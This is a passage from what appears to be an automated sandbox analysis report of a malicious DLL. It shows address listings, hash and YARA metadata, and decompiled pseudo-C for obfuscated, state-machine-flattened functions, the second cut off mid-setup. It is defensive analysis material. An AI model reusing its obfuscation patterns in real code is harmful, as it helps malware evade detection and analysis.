                                                                        0x1001e7fd
                                                                        0x1001e802
                                                                        0x1001e809
                                                                        0x1001e816
                                                                        0x1001e81e
                                                                        0x1001e823
                                                                        0x1001e831
                                                                        0x1001e834
                                                                        0x1001e838
                                                                        0x1001e840
                                                                        0x1001e84b
                                                                        0x1001e856
                                                                        0x1001e861
                                                                        0x1001e86c
                                                                        0x1001e877
                                                                        0x1001e882
                                                                        0x1001e88a
                                                                        0x1001e88f
                                                                        0x1001e894
                                                                        0x1001e89c
                                                                        0x1001e8a7
                                                                        0x1001e8b2
                                                                        0x1001e8bd
                                                                        0x1001e8c8
                                                                        0x1001e8d3
                                                                        0x1001e8de
                                                                        0x1001e8e6
                                                                        0x1001e8eb
                                                                        0x1001e8f0
                                                                        0x1001e8f0
                                                                        0x1001e8f5
                                                                        0x1001e8f5
                                                                        0x1001e8f5
                                                                        0x1001e8f5
                                                                        0x1001e8fb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001e901
                                                                        0x1001ea28
                                                                        0x1001ea29
                                                                        0x1001ea2e
                                                                        0x1001ea33
                                                                        0x1001ea36
                                                                        0x1001ea3c
                                                                        0x00000000
                                                                        0x1001ea3c
                                                                        0x1001e907
                                                                        0x1001e90d
                                                                        0x1001e9f3
                                                                        0x1001e9fd
                                                                        0x1001ea02
                                                                        0x1001ea07
                                                                        0x1001ebf8
                                                                        0x1001ea0d
                                                                        0x1001ea0d
                                                                        0x00000000
                                                                        0x1001ea0d
                                                                        0x1001e913
                                                                        0x1001e915
                                                                        0x1001e9b6
                                                                        0x1001e9bb
                                                                        0x1001e9c1
                                                                        0x1001e9c2
                                                                        0x00000000
                                                                        0x1001e91b
                                                                        0x1001e921
                                                                        0x1001e98c
                                                                        0x1001e997
                                                                        0x1001e99d
                                                                        0x1001e99e
                                                                        0x00000000
                                                                        0x1001e923
                                                                        0x1001e929
                                                                        0x1001ebec
                                                                        0x1001e92f
                                                                        0x1001e935
                                                                        0x00000000
                                                                        0x1001e93b
                                                                        0x1001e940
                                                                        0x1001e957
                                                                        0x1001e95b
                                                                        0x1001e960
                                                                        0x1001e967
                                                                        0x1001e96f
                                                                        0x00000000
                                                                        0x1001e96f
                                                                        0x1001e935
                                                                        0x1001e929
                                                                        0x1001e921
                                                                        0x1001e915
                                                                        0x1001e90d
                                                                        0x1001ebf9
                                                                        0x1001ec05
                                                                        0x1001ec05
                                                                        0x1001ea4c
                                                                        0x1001eb79
                                                                        0x1001eb96
                                                                        0x1001eba4
                                                                        0x1001eba9
                                                                        0x1001ebae
                                                                        0x1001ebba
                                                                        0x00000000
                                                                        0x1001ebb0
                                                                        0x1001ebb0
                                                                        0x00000000
                                                                        0x1001ebb0
                                                                        0x1001ea52
                                                                        0x1001ea58
                                                                        0x1001eb3e
                                                                        0x1001eb5c
                                                                        0x1001eb60
                                                                        0x1001eb68
                                                                        0x1001eb6a
                                                                        0x1001eb6f
                                                                        0x00000000
                                                                        0x1001ea5e
                                                                        0x1001ea64
                                                                        0x1001eaeb
                                                                        0x1001eaf5
                                                                        0x1001eafb
                                                                        0x1001eafc
                                                                        0x00000000
                                                                        0x1001ea66
                                                                        0x1001ea6c
                                                                        0x00000000
                                                                        0x1001ea72
                                                                        0x1001ea72
                                                                        0x1001ea85
                                                                        0x1001eabe
                                                                        0x1001eac3
                                                                        0x1001eaca
                                                                        0x1001ead2
                                                                        0x00000000
                                                                        0x1001ead2
                                                                        0x1001ea6c
                                                                        0x1001ea64
                                                                        0x1001ea58
                                                                        0x00000000
                                                                        0x1001ebbf
                                                                        0x1001ebbf
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: q$!$$&o$'d$.Y$0vz5$C=wU$H$W}$^*$d/Q$fA$fC$g0$m2$mO$C
                                                                        • API String ID: 0-3046912973
                                                                        • Opcode ID: 7c72271ec2ee9b29a4bd603220aea34a566be452ea304f07fd4abb6d9bc15b99
                                                                        • Instruction ID: a67a5d6662a05d5da01197eb55bbec18b74cc61d11ec80b6fdc783dee153aef3
                                                                        • Opcode Fuzzy Hash: 7c72271ec2ee9b29a4bd603220aea34a566be452ea304f07fd4abb6d9bc15b99
                                                                        • Instruction Fuzzy Hash: 6B321671508380DFE3A8CF65C98AA4FBBE1FB84754F108A0DE5D9962A0D7B59948CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10007E34, Relevance: 21.7, Strings: 17, Instructions: 464COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E10007E34(intOrPtr __ecx, intOrPtr __edx) {
				char _v524;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				unsigned int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				void* _t497;
				intOrPtr _t500;
				intOrPtr _t502;
				intOrPtr _t505;
				void* _t510;
				intOrPtr _t514;
				intOrPtr _t516;
				intOrPtr _t524;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				signed int _t540;
				void* _t541;
				void* _t543;
				signed int _t598;
				intOrPtr _t599;
				signed int _t600;
				intOrPtr _t604;
				signed int* _t605;
				signed int* _t606;
				void* _t611;

				_t605 =  &_v732;
				_v548 = _v548 & 0x00000000;
				_v608 = 0x8e77;
				_v544 = __edx;
				_t604 = __ecx;
				_t600 = 0xf92d88;
				_t598 = 0x7f;
				_v608 = _v608 / _t598;
				_v608 = _v608 ^ 0x0200011f;
				_v664 = 0x5ee6;
				_v664 = _v664 >> 6;
				_t527 = 0x74;
				_v664 = _v664 * 0x3a;
				_v664 = _v664 ^ 0x00004336;
				_v724 = 0x97d5;
				_v724 = _v724 / _t527;
				_v724 = _v724 | 0x73d16624;
				_t528 = 0x48;
				_v724 = _v724 / _t528;
				_v724 = _v724 ^ 0x019bc567;
				_v684 = 0xe6c9;
				_v684 = _v684 << 4;
				_t529 = 0x2a;
				_v684 = _v684 / _t529;
				_t530 = 0xc;
				_v684 = _v684 * 0x45;
				_v684 = _v684 ^ 0x0017da0f;
				_v596 = 0x84c3;
				_v596 = _v596 >> 0xc;
				_v596 = _v596 ^ 0x00000094;
				_v716 = 0x73cc;
				_v716 = _v716 >> 5;
				_v716 = _v716 * 0x51;
				_v716 = _v716 + 0xffff7ccf;
				_v716 = _v716 ^ 0x000099a4;
				_v700 = 0xc2fe;
				_v700 = _v700 | 0x0147ff89;
				_v700 = _v700 >> 2;
				_v700 = _v700 + 0xffffed96;
				_v700 = _v700 ^ 0x0051cc5f;
				_v624 = 0x598b;
				_v624 = _v624 * 0x46;
				_v624 = _v624 / _t530;
				_v624 = _v624 ^ 0x00023e05;
				_v560 = 0x1a77;
				_v560 = _v560 / _t598;
				_v560 = _v560 ^ 0x000017c3;
				_v640 = 0x468b;
				_v640 = _v640 ^ 0xf8cef0f9;
				_v640 = _v640 ^ 0x157598e1;
				_v640 = _v640 ^ 0xedbb3f55;
				_v660 = 0x95cb;
				_v660 = _v660 ^ 0xe0385738;
				_t103 =  &_v660; // 0xe0385738
				_t531 = 0x34;
				_v660 =  *_t103 * 0x38;
				_v660 = _v660 ^ 0x0c6ae6d8;
				_v692 = 0x21c1;
				_v692 = _v692 / _t531;
				_t532 = 0x70;
				_v692 = _v692 * 0x25;
				_v692 = _v692 << 4;
				_v692 = _v692 ^ 0x00016ad5;
				_v592 = 0xa9db;
				_v592 = _v592 ^ 0x5846e700;
				_v592 = _v592 ^ 0x584631e9;
				_v600 = 0x3eca;
				_v600 = _v600 + 0x9bab;
				_v600 = _v600 ^ 0x0000ec74;
				_v672 = 0x247b;
				_v672 = _v672 + 0xffff7cea;
				_v672 = _v672 + 0xffff49cc;
				_v672 = _v672 ^ 0xfffef3f1;
				_v720 = 0x5bb8;
				_v720 = _v720 << 5;
				_v720 = _v720 << 0xe;
				_v720 = _v720 * 0x69;
				_v720 = _v720 ^ 0xf3c05410;
				_v604 = 0x12e;
				_v604 = _v604 ^ 0xcbcc0f39;
				_v604 = _v604 ^ 0xcbcc0717;
				_v676 = 0x4f1f;
				_v676 = _v676 + 0xffffd823;
				_v676 = _v676 ^ 0x00001628;
				_v668 = 0xa101;
				_v668 = _v668 / _t532;
				_v668 = _v668 << 7;
				_v668 = _v668 ^ 0x0000d0e8;
				_v712 = 0xf562;
				_v712 = _v712 + 0xe29d;
				_v712 = _v712 | 0xaf029352;
				_t533 = 0x2c;
				_v712 = _v712 / _t533;
				_v712 = _v712 ^ 0x03fa2878;
				_v584 = 0xa7c6;
				_v584 = _v584 ^ 0x2308cfbe;
				_v584 = _v584 ^ 0x23086838;
				_v696 = 0xba3e;
				_v696 = _v696 << 9;
				_v696 = _v696 ^ 0x7a641ee8;
				_v696 = _v696 >> 2;
				_v696 = _v696 ^ 0x1ec44f4b;
				_v568 = 0x7d1;
				_v568 = _v568 << 2;
				_v568 = _v568 ^ 0x00007750;
				_v704 = 0x3590;
				_v704 = _v704 * 0x4c;
				_v704 = _v704 << 2;
				_v704 = _v704 << 8;
				_v704 = _v704 ^ 0x3f9b76a0;
				_v576 = 0x6e4c;
				_v576 = _v576 << 8;
				_v576 = _v576 ^ 0x006e4c78;
				_v636 = 0xe1b3;
				_t534 = 0x38;
				_v636 = _v636 / _t534;
				_v636 = _v636 | 0xbc23d7c2;
				_v636 = _v636 ^ 0xbc23f6d4;
				_v644 = 0xc193;
				_v644 = _v644 + 0xffffe081;
				_v644 = _v644 | 0xe7ea23f6;
				_v644 = _v644 ^ 0xe7eab5c6;
				_v652 = 0xff18;
				_v652 = _v652 ^ 0x15e6b590;
				_v652 = _v652 | 0x9145bae2;
				_v652 = _v652 ^ 0x95e7a511;
				_v688 = 0x91dc;
				_v688 = _v688 << 0xf;
				_v688 = _v688 + 0xffffec69;
				_v688 = _v688 + 0x152;
				_v688 = _v688 ^ 0x48ede9e6;
				_v588 = 0xda26;
				_t535 = 0x43;
				_v588 = _v588 / _t535;
				_v588 = _v588 ^ 0x00003ef3;
				_v728 = 0x13e1;
				_v728 = _v728 << 5;
				_v728 = _v728 | 0x81597e77;
				_t536 = 0x67;
				_v728 = _v728 / _t536;
				_v728 = _v728 ^ 0x0141a54f;
				_v732 = 0xfe77;
				_v732 = _v732 ^ 0xa2bc77b9;
				_v732 = _v732 << 0xb;
				_t537 = 0x3d;
				_v732 = _v732 * 0x1f;
				_v732 = _v732 ^ 0xa57fc270;
				_v564 = 0xd716;
				_v564 = _v564 ^ 0x4072510d;
				_v564 = _v564 ^ 0x40729e8d;
				_v708 = 0xf6c2;
				_v708 = _v708 + 0xffff713e;
				_v708 = _v708 * 0xe;
				_v708 = _v708 / _t537;
				_v708 = _v708 ^ 0x00002963;
				_v580 = 0x83ac;
				_t538 = 0x4a;
				_v580 = _v580 / _t538;
				_v580 = _v580 ^ 0x000067e0;
				_v632 = 0xd307;
				_v632 = _v632 >> 0xb;
				_v632 = _v632 ^ 0x73d3f358;
				_v632 = _v632 ^ 0x73d3bdee;
				_v656 = 0x12d9;
				_v656 = _v656 | 0x78eb2603;
				_v656 = _v656 + 0xffffb5b9;
				_v656 = _v656 ^ 0x78eaf389;
				_v552 = 0x5776;
				_v552 = _v552 + 0x2f24;
				_v552 = _v552 ^ 0x00009a22;
				_v616 = 0x2c00;
				_v616 = _v616 + 0x792b;
				_v616 = _v616 + 0xffffa094;
				_v616 = _v616 ^ 0x00000aad;
				_v572 = 0x3f59;
				_v572 = _v572 | 0xe3450093;
				_v572 = _v572 ^ 0xe3451fd2;
				_v556 = 0x6ea6;
				_t539 = 0x1d;
				_t524 = _v544;
				_v556 = _v556 * 0x56;
				_v556 = _v556 ^ 0x002547d9;
				_v648 = 0xf811;
				_v648 = _v648 << 8;
				_v648 = _v648 ^ 0xcc5c85c7;
				_v648 = _v648 ^ 0xcca4883c;
				_v612 = 0xcfc1;
				_t599 = _v544;
				_v612 = _v612 * 0x33;
				_v612 = _v612 >> 1;
				_v612 = _v612 ^ 0x0014c5bf;
				_v620 = 0x3b04;
				_v620 = _v620 >> 3;
				_v620 = _v620 ^ 0x957054e4;
				_v620 = _v620 ^ 0x95705ef6;
				_v628 = 0x17ec;
				_v628 = _v628 / _t539;
				_v628 = _v628 + 0xffffc55c;
				_v628 = _v628 ^ 0xffffc912;
				_v680 = 0x1f47;
				_v680 = _v680 | 0x8760986b;
				_t540 = 0x6b;
				_v680 = _v680 / _t540;
				_v680 = _v680 + 0xeba5;
				_v680 = _v680 ^ 0x0144ccb9;
				while(1) {
					L1:
					_t497 = 0x22698256;
					while(1) {
						L2:
						_t541 = 0x37da4205;
						do {
							while(1) {
								L3:
								_t611 = _t600 - 0x1571d90b;
								if(_t611 > 0) {
									break;
								}
								if(_t611 == 0) {
									_t510 = E1000934C(_t541);
									__eflags = _t510 - E10014DBD();
									_t497 = 0x22698256;
									_t600 = 0x695d68;
									_t524 =  !=  ? 0x22698256 : 0xbd09969;
									while(1) {
										L2:
										_t541 = 0x37da4205;
										goto L3;
									}
								}
								if(_t600 == 0x695d68) {
									__eflags = _t524 - _t497;
									if(_t524 != _t497) {
										_t600 = 0xd0bbcc0;
										continue;
									} else {
										_push(_v608);
										E10004BDE(_v716, _v700,  &_v548, _v624, _t541);
										_t605 =  &(_t605[5]);
										asm("sbb esi, esi");
										_t600 = (_t600 & 0xff859553) + 0xd86276d;
										while(1) {
											L1:
											_t497 = 0x22698256;
											L2:
											_t541 = 0x37da4205;
											goto L3;
										}
									}
									L34:
								}
								if(_t600 != 0xf92d88) {
									if(_t600 == 0xd0bbcc0) {
										_push( &_v524);
										_push(0x10001318);
										_t516 = E10002628(_t604, _v544);
										__eflags = _t516;
										_t497 = 0x22698256;
										if(_t516 == 0) {
											__eflags = _t524 - 0x22698256;
											if(_t524 == 0x22698256) {
												E100078F0(_v548, _v560, _v640, _v660, _v692);
												_t605 =  &(_t605[3]);
												_t497 = 0x22698256;
											}
											_t600 = 0xd86276d;
											goto L2;
										} else {
											__eflags = _t524 - 0x22698256;
											_t541 = 0x37da4205;
											_t600 =  ==  ? 0x37da4205 : 0x39310db5;
											continue;
										}
									} else {
										if(_t600 == 0xd86276d) {
											return E100091CD(_v612, _v620, _v628, _t599, _v680);
										}
										goto L30;
									}
								}
								_push(_t541);
								_t543 = 0x24;
								_t514 = E100157E8(_t543);
								_t599 = _t514;
								__eflags = _t599;
								if(_t599 != 0) {
									_t600 = 0x1571d90b;
									while(1) {
										L1:
										_t497 = 0x22698256;
										goto L2;
									}
								}
								return _t514;
								goto L34;
							}
							__eflags = _t600 - _t541;
							if(_t600 == _t541) {
								_t500 = E1001D530(_v592,  &_v524, _v600, _v672,  &_v540, _v720, _v548, _v604);
								_t606 =  &(_t605[8]);
								__eflags = _t500;
								if(_t500 != 0) {
									E100078F0(_v540, _v676, _v668, _v712, _v584);
									E100078F0(_v536, _v696, _v568, _v704, _v576);
									_t606 =  &(_t606[6]);
								}
								E100078F0(_v548, _v636, _v644, _v652, _v688);
								_t605 =  &(_t606[3]);
								_t600 = 0x38dc6618;
								_t497 = 0x22698256;
								_t541 = 0x37da4205;
								goto L30;
							} else {
								__eflags = _t600 - 0x38dc6618;
								if(_t600 == 0x38dc6618) {
									 *((intOrPtr*)(_t599 + 0x20)) = _t604;
									_t502 =  *0x10021400; // 0x0
									 *((intOrPtr*)(_t599 + 0x10)) = _t502;
									 *0x10021400 = _t599;
									return _t502;
								}
								__eflags = _t600 - 0x39310db5;
								if(__eflags != 0) {
									goto L30;
								} else {
									_push(_v708);
									_push(0);
									_push(0);
									_push(_t541);
									_push(_v564);
									_push(_v732);
									_push( &_v524);
									_push( &_v540);
									_t505 = E100189F6(_v588, _v728, __eflags);
									_t605 =  &(_t605[8]);
									__eflags = _t505;
									if(_t505 != 0) {
										E100078F0(_v540, _v580, _v632, _v656, _v552);
										E100078F0(_v536, _v616, _v572, _v556, _v648);
										_t605 =  &(_t605[6]);
									}
									_t600 = 0x38dc6618;
									goto L1;
								}
							}
							goto L34;
							L30:
							__eflags = _t600 - 0x2870efef;
						} while (_t600 != 0x2870efef);
						return _t497;
					}
				}
			}





















































































                                                                        0x10007e34
                                                                        0x10007e3a
                                                                        0x10007e42
                                                                        0x10007e52
                                                                        0x10007e59
                                                                        0x10007e5d
                                                                        0x10007e64
                                                                        0x10007e69
                                                                        0x10007e70
                                                                        0x10007e7b
                                                                        0x10007e83
                                                                        0x10007e8f
                                                                        0x10007e92
                                                                        0x10007e96
                                                                        0x10007e9e
                                                                        0x10007eae
                                                                        0x10007eb2
                                                                        0x10007ebe
                                                                        0x10007ec3
                                                                        0x10007ec7
                                                                        0x10007ecf
                                                                        0x10007ed7
                                                                        0x10007ee2
                                                                        0x10007ee7
                                                                        0x10007ef2
                                                                        0x10007ef3
                                                                        0x10007ef7
                                                                        0x10007eff
                                                                        0x10007f0a
                                                                        0x10007f12
                                                                        0x10007f1d
                                                                        0x10007f25
                                                                        0x10007f2f
                                                                        0x10007f33
                                                                        0x10007f3b
                                                                        0x10007f43
                                                                        0x10007f4b
                                                                        0x10007f53
                                                                        0x10007f58
                                                                        0x10007f60
                                                                        0x10007f68
                                                                        0x10007f75
                                                                        0x10007f81
                                                                        0x10007f85
                                                                        0x10007f8d
                                                                        0x10007fa1
                                                                        0x10007fa8
                                                                        0x10007fb3
                                                                        0x10007fbb
                                                                        0x10007fc3
                                                                        0x10007fcb
                                                                        0x10007fd3
                                                                        0x10007fdd
                                                                        0x10007fe5
                                                                        0x10007fec
                                                                        0x10007fef
                                                                        0x10007ff3
                                                                        0x10007ffb
                                                                        0x1000800b
                                                                        0x10008014
                                                                        0x10008017
                                                                        0x1000801b
                                                                        0x10008020
                                                                        0x10008028
                                                                        0x10008033
                                                                        0x1000803e
                                                                        0x10008049
                                                                        0x10008054
                                                                        0x1000805f
                                                                        0x1000806a
                                                                        0x10008072
                                                                        0x1000807a
                                                                        0x10008082
                                                                        0x1000808a
                                                                        0x10008092
                                                                        0x10008097
                                                                        0x100080a1
                                                                        0x100080a5
                                                                        0x100080ad
                                                                        0x100080b8
                                                                        0x100080c3
                                                                        0x100080ce
                                                                        0x100080d6
                                                                        0x100080e6
                                                                        0x100080ee
                                                                        0x100080fe
                                                                        0x10008102
                                                                        0x10008107
                                                                        0x1000810f
                                                                        0x10008117
                                                                        0x1000811f
                                                                        0x1000812b
                                                                        0x1000812e
                                                                        0x10008132
                                                                        0x1000813a
                                                                        0x10008145
                                                                        0x10008150
                                                                        0x1000815b
                                                                        0x10008163
                                                                        0x10008168
                                                                        0x10008170
                                                                        0x10008175
                                                                        0x1000817d
                                                                        0x10008188
                                                                        0x10008190
                                                                        0x1000819b
                                                                        0x100081a8
                                                                        0x100081ac
                                                                        0x100081b1
                                                                        0x100081b6
                                                                        0x100081be
                                                                        0x100081c9
                                                                        0x100081d1
                                                                        0x100081dc
                                                                        0x100081ec
                                                                        0x100081f1
                                                                        0x100081f7
                                                                        0x100081ff
                                                                        0x10008207
                                                                        0x1000820f
                                                                        0x10008217
                                                                        0x1000821f
                                                                        0x10008227
                                                                        0x1000822f
                                                                        0x10008237
                                                                        0x1000823f
                                                                        0x10008247
                                                                        0x1000824f
                                                                        0x10008254
                                                                        0x1000825c
                                                                        0x10008264
                                                                        0x1000826c
                                                                        0x1000827e
                                                                        0x10008283
                                                                        0x1000828c
                                                                        0x10008297
                                                                        0x1000829f
                                                                        0x100082a4
                                                                        0x100082b0
                                                                        0x100082b5
                                                                        0x100082bb
                                                                        0x100082c3
                                                                        0x100082cb
                                                                        0x100082d3
                                                                        0x100082dd
                                                                        0x100082e0
                                                                        0x100082e4
                                                                        0x100082ec
                                                                        0x100082f7
                                                                        0x10008302
                                                                        0x1000830d
                                                                        0x10008315
                                                                        0x10008322
                                                                        0x1000832e
                                                                        0x10008332
                                                                        0x1000833a
                                                                        0x1000834c
                                                                        0x1000834f
                                                                        0x10008356
                                                                        0x10008361
                                                                        0x10008369
                                                                        0x1000836e
                                                                        0x10008376
                                                                        0x1000837e
                                                                        0x10008386
                                                                        0x1000838e
                                                                        0x10008396
                                                                        0x1000839e
                                                                        0x100083a9
                                                                        0x100083b4
                                                                        0x100083bf
                                                                        0x100083ca
                                                                        0x100083d5
                                                                        0x100083e0
                                                                        0x100083eb
                                                                        0x100083f8
                                                                        0x10008403
                                                                        0x1000840e
                                                                        0x10008423
                                                                        0x10008426
                                                                        0x1000842d
                                                                        0x10008434
                                                                        0x1000843f
                                                                        0x10008447
                                                                        0x1000844c
                                                                        0x10008454
                                                                        0x1000845c
                                                                        0x1000846f
                                                                        0x10008476
                                                                        0x1000847d
                                                                        0x10008484
                                                                        0x1000848f
                                                                        0x1000849a
                                                                        0x100084a2
                                                                        0x100084ad
                                                                        0x100084b8
                                                                        0x100084c8
                                                                        0x100084cc
                                                                        0x100084d4
                                                                        0x100084dc
                                                                        0x100084e4
                                                                        0x100084f0
                                                                        0x100084f3
                                                                        0x100084f7
                                                                        0x100084ff
                                                                        0x10008507
                                                                        0x10008507
                                                                        0x10008507
                                                                        0x1000850c
                                                                        0x1000850c
                                                                        0x1000850c
                                                                        0x10008511
                                                                        0x10008511
                                                                        0x10008511
                                                                        0x10008511
                                                                        0x10008517
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000851d
                                                                        0x10008660
                                                                        0x1000866c
                                                                        0x10008673
                                                                        0x10008678
                                                                        0x1000867d
                                                                        0x1000850c
                                                                        0x1000850c
                                                                        0x1000850c
                                                                        0x00000000
                                                                        0x1000850c
                                                                        0x1000850c
                                                                        0x10008529
                                                                        0x1000860b
                                                                        0x1000860d
                                                                        0x1000864b
                                                                        0x00000000
                                                                        0x1000860f
                                                                        0x1000860f
                                                                        0x1000862e
                                                                        0x10008633
                                                                        0x10008638
                                                                        0x10008640
                                                                        0x10008507
                                                                        0x10008507
                                                                        0x10008507
                                                                        0x1000850c
                                                                        0x1000850c
                                                                        0x00000000
                                                                        0x1000850c
                                                                        0x10008507
                                                                        0x00000000
                                                                        0x1000860d
                                                                        0x10008535
                                                                        0x10008541
                                                                        0x10008584
                                                                        0x10008585
                                                                        0x1000858c
                                                                        0x10008592
                                                                        0x10008594
                                                                        0x1000859a
                                                                        0x100085b0
                                                                        0x100085b2
                                                                        0x100085ce
                                                                        0x100085d3
                                                                        0x100085d6
                                                                        0x100085d6
                                                                        0x100085db
                                                                        0x00000000
                                                                        0x1000859c
                                                                        0x1000859c
                                                                        0x100085a3
                                                                        0x100085a8
                                                                        0x00000000
                                                                        0x100085a8
                                                                        0x10008543
                                                                        0x10008549
                                                                        0x00000000
                                                                        0x1000856e
                                                                        0x00000000
                                                                        0x10008549
                                                                        0x10008541
                                                                        0x100085ed
                                                                        0x100085f0
                                                                        0x100085f1
                                                                        0x100085f6
                                                                        0x100085f9
                                                                        0x100085fb
                                                                        0x10008601
                                                                        0x10008507
                                                                        0x10008507
                                                                        0x10008507
                                                                        0x00000000
                                                                        0x10008507
                                                                        0x10008507
                                                                        0x10008815
                                                                        0x00000000
                                                                        0x10008815
                                                                        0x10008685
                                                                        0x10008687
                                                                        0x1000876b
                                                                        0x10008770
                                                                        0x10008773
                                                                        0x10008775
                                                                        0x10008791
                                                                        0x100087b6
                                                                        0x100087bb
                                                                        0x100087bb
                                                                        0x100087d5
                                                                        0x100087da
                                                                        0x100087dd
                                                                        0x100087e2
                                                                        0x100087e7
                                                                        0x00000000
                                                                        0x1000868d
                                                                        0x1000868d
                                                                        0x10008693
                                                                        0x100087fa
                                                                        0x100087fd
                                                                        0x10008802
                                                                        0x10008805
                                                                        0x00000000
                                                                        0x10008805
                                                                        0x10008699
                                                                        0x1000869f
                                                                        0x00000000
                                                                        0x100086a5
                                                                        0x100086a5
                                                                        0x100086b0
                                                                        0x100086b2
                                                                        0x100086b4
                                                                        0x100086b5
                                                                        0x100086bc
                                                                        0x100086cb
                                                                        0x100086d3
                                                                        0x100086d4
                                                                        0x100086d9
                                                                        0x100086dc
                                                                        0x100086de
                                                                        0x100086fd
                                                                        0x10008725
                                                                        0x1000872a
                                                                        0x1000872a
                                                                        0x1000872d
                                                                        0x00000000
                                                                        0x1000872d
                                                                        0x1000869f
                                                                        0x00000000
                                                                        0x100087ec
                                                                        0x100087ec
                                                                        0x100087ec
                                                                        0x00000000
                                                                        0x10008511
                                                                        0x1000850c

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Qr@$$/$+y$8W8$Pw$Y?$c)$h]i$h]i$t$xLn${$$1FX$^$g$p($H
                                                                        • API String ID: 0-1563294895
                                                                        • Opcode ID: 171111c34be3d9b94ac95fd15d466b49e40bc1f9e22da6f9989ed6422f849ba4
                                                                        • Instruction ID: f7445f3b1b55f540d70f1e3b73910c5f00ddc209463d1ebaed6bac0f40c33f80
                                                                        • Opcode Fuzzy Hash: 171111c34be3d9b94ac95fd15d466b49e40bc1f9e22da6f9989ed6422f849ba4
                                                                        • Instruction Fuzzy Hash: 0F32117250C3818FE368CF25C949A8BBBE1FBC5748F10891DE6D9962A0D7B59909CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001F411, Relevance: 20.4, Strings: 16, Instructions: 435COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E1001F411() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				intOrPtr _v1568;
				char _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				unsigned int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				void* _t493;
				signed int _t495;
				signed int _t497;
				void* _t499;
				void* _t505;
				signed int _t516;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				void* _t530;
				void* _t533;
				void* _t539;
				void* _t581;
				signed int* _t586;

				_t586 =  &_v1764;
				_v1568 = 0x6bc4b7;
				_v1564 = 0;
				_v1616 = 0x7b31;
				_v1616 = _v1616 >> 5;
				_v1616 = _v1616 ^ 0x000003f0;
				_v1636 = 0x8aee;
				_v1636 = _v1636 << 6;
				_v1636 = _v1636 ^ 0xb9ff3183;
				_v1636 = _v1636 ^ 0x39dd8a02;
				_v1756 = 0x620;
				_v1756 = _v1756 | 0x6d559036;
				_v1756 = _v1756 << 8;
				_v1576 = 0;
				_t581 = 0x3875c21b;
				_t519 = 0x48;
				_v1756 = _v1756 / _t519;
				_v1756 = _v1756 ^ 0x01304efa;
				_v1684 = 0x5cfd;
				_t520 = 0x36;
				_v1684 = _v1684 * 0x52;
				_v1684 = _v1684 * 0x24;
				_v1684 = _v1684 ^ 0x04302f49;
				_v1628 = 0x396e;
				_v1628 = _v1628 * 0x28;
				_v1628 = _v1628 ^ 0x0008c3d7;
				_v1696 = 0x5408;
				_v1696 = _v1696 >> 0xc;
				_v1696 = _v1696 << 0xe;
				_v1696 = _v1696 << 1;
				_v1696 = _v1696 ^ 0x0002db53;
				_v1760 = 0x3df4;
